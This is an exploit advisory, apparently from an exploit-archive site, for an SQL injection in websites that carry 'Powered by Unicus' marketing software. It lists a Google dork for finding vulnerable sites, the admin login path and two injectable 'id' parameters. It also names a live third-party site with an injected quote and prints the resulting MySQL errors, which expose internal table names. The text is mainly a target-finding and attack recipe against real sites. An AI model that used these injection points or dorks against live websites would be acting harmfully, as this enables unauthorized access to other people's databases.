facebook facebook twitter rss

Powered by Unicus Marketing SQL Injection Vulnerability

Author: KingSkrupellos , Published: 18-10-2018
# Exploit Title : Powered by Unicus Marketing SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 20/10/2018
# Vendor Homepage : unicusmarketing.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : intext:''Powered by Unicus''
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Admin Panel Login Path :

/admin/

# SQL Injection Exploit :

/article.php?id=[SQL Injection]

/issue.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Site =>

animalbehaviorandcognition.org/article.php?id=1110%27 => [ Proof of Concept ] => archive.is/zecXx

# SQL Database Error =>

Error in fetching records in table "journal_articles".
Query : select journal_articles.* from journal_articles where journal_articles.id=1110'
Error is :You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''' at line 1

Error in fetching records in table "journals left join volumes on journals.volume_id = volumes.id".
Query : select journals.*, volumes.title as volume_title from journals left join volumes on
journals.volume_id = volumes.id where journals.id=14'
Error is :You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near ''' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :